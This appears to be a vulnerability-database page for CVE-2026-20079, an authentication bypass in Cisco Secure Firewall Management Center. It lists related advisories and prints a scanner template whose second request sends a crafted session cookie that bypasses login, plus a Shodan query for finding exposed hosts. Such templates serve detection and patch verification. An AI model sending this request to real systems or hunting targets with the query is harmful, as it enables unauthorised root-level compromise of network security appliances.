| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Exploit for CVE-2026-20079 | 5 Mar 202616:12 | – | githubexploit | |
| Exploit for CVE-2026-20079 | 6 Mar 202605:32 | – | githubexploit | |
| CVE-2026-20079 | 4 Mar 202617:17 | – | attackerkb | |
| The vulnerability in the web interface of the Cisco Secure Firewall Management Center software (previously known as Cisco Firepower Management Center) allows a malicious actor to bypass security restrictions, execute arbitrary code, and increase their privileges. | 5 May 202600:00 | – | bdu_fstec | |
| CVE-2026-20079 | 4 Mar 202616:23 | – | circl | |
| Cisco Secure Firewall Management Center Software Authentication Bypass Vulnerability | 4 Mar 202616:00 | – | cisco | |
| Cisco Secure Firewall Management Center Software Authentication Bypass (cisco-sa-onprem-fmc-authbypass-5JPp45V2) | 13 Mar 202600:00 | – | nessus | |
| Cisco Secure Firewall Management Center 安全漏洞 | 4 Mar 202600:00 | – | cnnvd | |
| CVE-2026-20079 | 4 Mar 202617:17 | – | cve | |
| CVE-2026-20079 | 4 Mar 202617:17 | – | cvelist |
id: CVE-2026-20079
info:
name: Cisco Secure Firewall Management Center - Authentication Bypass
author: theamanrawat
severity: critical
description: |
Cisco Secure Firewall Management Center Software contains an authentication bypass caused by improper system process creation at boot, letting unauthenticated remote attackers execute scripts and gain root access, exploit requires crafted HTTP requests.
impact: |
Unauthenticated remote attackers can gain root access by executing scripts, leading to full system compromise.
remediation: |
Update to the latest available version.
reference:
- https://www.vulncheck.com/blog/cisco-fmc-auth-bypass-cve-2026-20079
- https://nvd.nist.gov/vuln/detail/CVE-2026-20079
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2026-20079
epss-score: 0.33898
epss-percentile: 0.98192
cwe-id: CWE-288
metadata:
verified: true
max-request: 1
shodan-query: html:"BackdraftSyncIntegration"
tags: cve,cve2026,cisco,fmc,auth-bypass,rce,unauth
flow: http(1) && http(2)
http:
- raw:
- |
GET /help/about.cgi HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(body, "Invalid session ID")'
condition: and
internal: true
- raw:
- |
GET /help/about.cgi HTTP/1.1
Host: {{Hostname}}
Cookie: CGISESSID=csm_processes
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "Cisco Secure Firewall Management Center", "Model", "OS", "Hostname")'
condition: and
# digest: 4a0a004730450221009aeece1d59d530ce662bb1b081dc74110d94b73bcd5f62389b757044a4b8f97f02206c0706000a79a095d2f50caba1070955a3db0b5a620a2313064957eeb0b964de:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation